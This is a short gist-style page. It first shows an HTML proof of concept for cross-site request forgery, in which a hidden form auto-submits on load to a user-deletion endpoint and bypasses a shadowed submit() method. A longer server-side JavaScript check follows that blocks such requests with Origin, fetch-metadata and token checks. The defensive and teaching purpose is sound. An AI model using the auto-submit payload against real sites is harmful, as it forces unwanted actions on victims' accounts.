Created
January 18, 2021 20:41
Autosubmit Form CSRF PoC
```html
<html>
  <!-- The hidden input named "submit" shadows the form's own submit() method,
       so submit() is borrowed from a fresh form element and called on myForm. -->
  <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
    <form id="myForm" name="myForm" action="http://example.com/deleteuser.php" method="POST">
      <input type="hidden" name="val1" id="val1" value="value1"/>
      <input type="hidden" name="val2" id="val2" value="value2"/>
      <input type="hidden" name="val3" id="val3" value="value3"/>
      <input type="hidden" name="submit" id="submit" value="Continue"/>
    </form>
  </body>
</html>
```
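A server-side check that rejects the auto-submitted POST above, as an added example that is not part of the original gist. The trusted origin, the `csrf_token` field name, the session shape and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: decide whether a state-changing request may proceed.
// TRUSTED_ORIGIN, the csrf_token field and the session object are assumptions.
const TRUSTED_ORIGIN = 'http://example.com';
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Compare two equal-length strings without stopping at the first mismatch.
// (In Node, crypto.timingSafeEqual on Buffers is the standard alternative.)
function constantTimeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, headers (lower-case keys), body }; session: { csrfToken }
function checkStateChangingRequest(req, session) {
  if (SAFE_METHODS.has(req.method)) return { allow: true, reason: 'safe method' };

  // Fetch metadata: browsers attach it only for HTTPS (trustworthy) targets.
  const site = req.headers['sec-fetch-site'];
  if (site !== undefined && site !== 'same-origin') {
    return { allow: false, reason: 'cross-site fetch metadata' };
  }
  // A form posted from another page carries that page's origin (or "null").
  const origin = req.headers['origin'];
  if (origin !== undefined && origin !== TRUSTED_ORIGIN) {
    return { allow: false, reason: 'foreign Origin' };
  }
  // Headers may be absent, so the per-session token is always required.
  if (!session.csrfToken || !constantTimeEqual(req.body.csrf_token, session.csrfToken)) {
    return { allow: false, reason: 'missing or wrong CSRF token' };
  }
  return { allow: true, reason: 'origin and token verified' };
}

// Constructed sample data: the PoC's fields as a browser would submit them.
const SESSION = { csrfToken: 'b7e1c0d4a9f35562' };
const POC_FIELDS = { val1: 'value1', val2: 'value2', val3: 'value3', submit: 'Continue' };
const POC_REQUEST = { method: 'POST', headers: { origin: 'http://other-site.example' }, body: POC_FIELDS };
const POC_NO_ORIGIN = { method: 'POST', headers: {}, body: POC_FIELDS };
const LEGIT_REQUEST = {
  method: 'POST',
  headers: { origin: TRUSTED_ORIGIN },
  body: { ...POC_FIELDS, csrf_token: SESSION.csrfToken },
};
```

The token check is what stops the request when a client omits `Origin`; a `SameSite` attribute on the session cookie is a separate, complementary control not shown here.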